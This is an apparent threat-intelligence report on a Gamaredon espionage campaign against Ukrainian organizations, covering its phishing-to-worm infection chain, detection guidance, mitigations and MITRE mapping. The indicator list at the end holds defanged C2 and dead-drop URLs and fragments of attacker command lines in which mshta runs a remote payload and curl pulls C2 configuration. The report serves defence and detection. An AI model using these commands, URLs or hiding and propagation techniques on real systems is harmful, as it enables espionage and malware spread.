FSB’s matryoshka #1/3 – Gamaredon’s gifts that keeps unpacking – GammaPhish and GammaWorm

What Happened

Russian state-sponsored hackers known as Gamaredon are targeting Ukrainian organizations with a highly evasive cyberespionage campaign. The attackers use deceptive emails and files to trick users into installing malicious software that hides deep within the Windows operating system. This matters because the malware can steal sensitive documents, monitor real-time activity, and spread to other computers via USB drives and network folders. Organizations should ensure their systems are fully updated, monitor for unusual hidden files, and restrict the use of unauthorized USB drives.

Key Takeaways

• Gamaredon continues to target Ukrainian entities using a highly modular, VBScript-driven architecture.
• The infection chain abuses legitimate services (Telegram, Cloudflare) as Dead Drop Resolvers (DDRs) to maintain resilient C2 infrastructure.
• GammaWorm propagates via USB and network drives, hiding legitimate directories and replacing them with malicious LNK files using Ukrainian lures.
• The malware heavily relies on NTFS Alternate Data Streams (ADS) to conceal its core modules and evade detection.

Affected Systems

• Windows OS

Vulnerabilities (CVEs)

• CVE-2025-8088
• CVE-2018-20250

Attack Chain

The attack begins with a spearphishing email containing an xHTML file that uses HTML smuggling to drop a malicious RAR archive. Exploiting CVE-2025-8088, the archive extracts an HTA file into the Windows Startup folder, which executes via mshta.exe to fetch the GammaLoad stager. GammaLoad deploys GammaWorm, which establishes persistence via scheduled tasks and registry keys, hiding its core modules within NTFS Alternate Data Streams (ADS). GammaWorm propagates by infecting USB and network drives with malicious LNK files, while continuously communicating with C2 servers via Dead Drop Resolvers hosted on legitimate platforms like Telegram and Cloudflare.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No

The article provides behavioral hunting opportunities and IOCs but does not include raw detection rules.

Detection Engineering Assessment

EDR Visibility: High — EDRs have strong visibility into process creation (mshta, wscript), scheduled task creation, registry modifications (RunOnce, HKCU\Console), and Alternate Data Stream (ADS) creation. Network Visibility: Medium — Network traffic is heavily obfuscated and blends with legitimate services (Telegram, Cloudflare), making signature-based network detection difficult, though high-frequency beaconing to specific DDRs can be spotted. Detection Difficulty: Moderate — While the use of legitimate platforms for C2 makes network detection hard, the host-based behaviors (ADS creation, specific registry keys, mshta/wscript execution patterns) are highly anomalous and detectable.

Required Log Sources

• Process Creation (Event ID 4688 / Sysmon 1)
• File Creation (Sysmon 11 - ADS creation)
• Registry Modification (Sysmon 12/13/14)
• Scheduled Task Creation (Event ID 4698)

Hunting Hypotheses

Control Gaps

• Network filtering allowing uncategorized or personal storage domains (Telegram, Cloudflare Workers)
• Lack of visibility into Alternate Data Stream (ADS) creation

Key Behavioral Indicators

• wscript.exe targeting a path containing a colon not followed by a backslash
• Creation of %USERPROFILE%:GTR or %USERPROFILE%:save
• Registry modifications in HKCU\Console\ storing URLs

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Verify against your organization's incident response runbook and team escalation paths before acting.
• Consider wiping any host confirmed to be infected with GammaWorm, as its DDR fallback mechanisms make complete remediation difficult.
• Evaluate whether to block the specific DDR URLs and C2 IP addresses provided in the IOC list.

Infrastructure Hardening

• If supported by your environment, consider restricting the execution of mshta.exe and wscript.exe via AppLocker or WDAC.
• Evaluate whether to disable or restrict the use of removable USB drives to prevent physical propagation of the worm.
• Consider implementing network segmentation to limit the lateral spread of malware via network shares.

User Protection

• If your EDR supports it, consider enabling strict rules around the creation and execution of Alternate Data Streams (ADS).
• Evaluate whether to enforce the display of hidden files and file extensions via Group Policy to counter the malware's registry modifications.

Security Awareness

• Consider training users to recognize social engineering lures, particularly those using provocative or urgent filenames (e.g., draft letters, deployment documents).
• Evaluate whether to educate employees on the risks of opening unexpected archive files or clicking on unknown shortcuts (LNK files) on USB drives.

MITRE ATT&CK Mapping

• T1566.001 - Phishing: Spearphishing Attachment
• T1027.006 - Obfuscated Files or Information: HTML Smuggling
• T1059.005 - Command and Scripting Interpreter: Visual Basic
• T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
• T1564.004 - Hide Artifacts: NTFS File Attributes
• T1053.005 - Scheduled Task/Job: Scheduled Task
• T1091 - Replication Through Removable Media
• T1102.001 - Web Service: Dead Drop Resolver
• T1218.005 - System Binary Proxy Execution: Mshta

Additional IOCs

• Domains:
  • quitethepastry[[.]]ru - Operator-controlled C2 domain
• Urls:
  • hxxp://iiwdsxwamylbwwsoyrmj[.]supabase[.]co/functions/v1/clever-responder/KokonGoogle_09.12.2025 - Tracking pixel URL used in GammaPhish
  • hxxps://www[.]bbc[.]com@iiwdsxwamylbwwsoyrmj[.]supabase[.]co/functions/v1/clever-responder/GurGoogle_09.12.2025/audience/capture.pdf - mshta payload URL
  • hxxps://bold[.]zsjtn41091[.]workers[.]dev - Dead Drop Resolver
  • hxxps://telegra[.]ph/f8bfl6sp-01-02 - Dead Drop Resolver
  • hxxps://moment-cat-qld-place[.]trycloudflare[.]com/sylvilagus - Dead Drop Resolver
  • hxxps:///t.me/s/teotori - Dead Drop Resolver
  • hxxps://www[.]telegram[.]me/s/oberfarir - Dead Drop Resolver
  • hxxps://efficiency-planes-emotions-fascinating[.]trycloudflare[.]com/@myrain/Xh1Lta2Ccro?84wtj9ob-01-31 - Dead Drop Resolver
• File Hashes:
  • 1794369214b7f62e70a0485e61335c61 (md5) - GammaPhish xHTML file
  • 8e1624d110c090ff57d4b493a9107c66 (md5) - GammaWorm ~.gif file
• Registry Keys:
  • HKCU\Console\WindowsUpdates - Stores active C2 infrastructure
  • HKCU\Console\WindowsResponby - Stores active C2 infrastructure
  • HKCU\Console\WindowsDetect - Stores active C2 infrastructure
  • HKCU\Console\URLTeletype - Stores active C2 infrastructure
  • HKCU\Console\WindowsTelegra - Stores active C2 infrastructure
  • HKCU\Console\URLTelegra - Stores active C2 infrastructure
  • HKCU\Console\IpURL - Stores active C2 infrastructure
  • HKEY_USERS\[SID]\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden - Modified to hide files and folders
• File Paths:
  • %USERPROFILE%:GTR - Alternate Data Stream containing GammaWorm core logic
  • %USERPROFILE%:save - Alternate Data Stream acting as a killswitch
  • %USERPROFILE%:URL - Alternate Data Stream for C2 resolution
  • %USERPROFILE%:LNK - Alternate Data Stream for propagation module
  • %USERPROFILE%:SERVER - Alternate Data Stream for C2 resolution clone
  • C:\Users\[USER]\AppData\Local\Temp\cancelH0S.mpg - Temporary file storing downloaded Telegram channel content
• Command Lines:
  • Purpose: Executes remote payload via mshta using a fake authentication string | Tools: mshta.exe | Stage: Execution | mshta.exe hxxps://www.bbc.com@
  • Purpose: Executes the GammaWorm VBScript payload | Tools: wscript.exe | Stage: Execution | wscript.exe ~.gif //b //e:vbScript
  • Purpose: Downloads C2 configuration from a Telegram channel | Tools: curl.exe | Stage: Command and Control | curl.exe hxxps://www.telegram.me/s/oberfarir -o